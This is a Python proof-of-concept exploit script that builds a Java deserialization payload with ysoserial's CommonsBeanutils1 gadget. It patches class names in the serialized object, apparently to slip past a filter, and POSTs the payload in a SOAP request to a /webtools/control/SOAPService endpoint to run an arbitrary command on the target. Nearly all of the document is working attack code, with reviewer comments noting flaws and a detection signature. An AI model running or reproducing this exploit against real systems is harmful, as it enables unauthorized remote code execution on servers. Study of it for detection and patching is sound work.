POC / exp.py PY
import requests
import binascii
import os
import argparse

# PoC driver: builds a Java serialized object with ysoserial, rewrites three
# class-name entries inside it via SerializationDumper, and POSTs the result to
# the target's SOAP endpoint. Every external tool is invoked through the shell,
# so the two jar files named below are expected in the current directory.
parser = argparse.ArgumentParser(description="example: python exp.py -u https://127.0.0.1:8443 -c \"calc.exe\"")
parser.add_argument("-u", "--url", help="目标url")  # help text: "target url"
parser.add_argument("-c", "--command", help="执行的命令,无回显")  # help text: "command to run; no output is returned"
args = parser.parse_args()

url = args.url
command = args.command
print(command)

if url and command:
    # Generate the CommonsBeanutils1 payload with ysoserial.
    # NOTE(review): `command` is interpolated unescaped into a shell line, so
    # any shell metacharacters in the -c value are interpreted by the local
    # shell before the jar sees them. The exit status returned by r.close() is
    # discarded, so if java fails the redirect has presumably already created
    # an empty raw_payload.obj and the script carries on with it.
    r = os.popen(
        'java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "{}" > raw_payload.obj'.format(command))
    r.close()

    # Convert the payload into SerializationDumper's readable text form.
    r = os.popen(
        'java -jar SerializationDumper-v1.13.jar -r raw_payload.obj > raw_payload.txt')
    r.close()

    # Edit the readable dump. Each pair of replace() calls bumps a class-name
    # length byte (0x2b->0x3f, 0x3f->0x59, 0x3a->0x4d) and appends bytes to
    # that class name's hex; the appended hex decodes to "<java." followed by
    # the class's short name. The dump is read as bytes and decoded as UTF-8.
    with open('raw_payload.txt', 'rb') as f:
        payload = f.read().decode()
    payload = payload.replace("Length - 43 - 0x00 2b", "Length - 43 - 0x00 3f")
    payload = payload.replace("0x6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72",
                              "0x6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f723c6a6176612e4265616e436f6d70617261746f72")
    payload = payload.replace("Length - 63 - 0x00 3f", "Length - 63 - 0x00 59")
    payload = payload.replace("0x6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f72",
                              "0x6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f723c6a6176612e436f6d70617261626c65436f6d70617261746f72")
    payload = payload.replace("Length - 58 - 0x00 3a", "Length - 58 - 0x00 4d")
    payload = payload.replace("0x636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c",
                              "0x636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c3c6a6176612e54656d706c61746573496d706c")

    # Write the edited readable dump back out.
    with open('new_payload.txt', 'wb') as f:
        f.write(payload.encode())

    # Rebuild a binary payload from the edited dump with SerializationDumper.
    # The exit status is again discarded (see the note on the first popen).
    r = os.popen(
        'java -jar SerializationDumper-v1.13.jar -b new_payload.txt new_payload.obj')
    r.close()

    # Hex-encode the rebuilt object; the hex text is embedded in the SOAP body.
    with open("new_payload.obj", 'rb') as f:
        payload = binascii.hexlify(f.read())

    # burp0_url = "https://127.0.0.1:8443/webtools/control/SOAPService"
    # Detection note: the request is a POST to /webtools/control/SOAPService
    # whose body carries the hex-encoded serialized object inside a <cus-obj>
    # element of a <map-HashMap> entry; the headers mimic a desktop browser.
    burp0_url = url + "/webtools/control/SOAPService"
    burp0_headers = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36",
                     "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}
    burp0_data = "\n        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n            <soapenv:Header/>\n            <soapenv:Body>\n            <ser>\n        <map-HashMap>\n            <map-Entry>\n                <map-Key>\n                    <cus-obj>{}</cus-obj>\n                </map-Key>\n                <map-Value>\n                    <std-String value=\"http://baidu.com\"/>\n                </map-Value>\n            </map-Entry>\n        </map-HashMap>\n            </ser>\n            </soapenv:Body>\n            </soapenv:Envelope>\n            ".format(
        payload.decode())
    # print(burp0_data)
    # NOTE(review): verify=False disables TLS certificate validation for this
    # request, and the response object is discarded (the -c help text says
    # there is no output), so neither success nor an HTTP error is reported.
    requests.post(burp0_url, headers=burp0_headers,
                  data=burp0_data, verify=False)
else:
    # Either -u or -c is missing: show usage instead of doing anything.
    parser.print_help()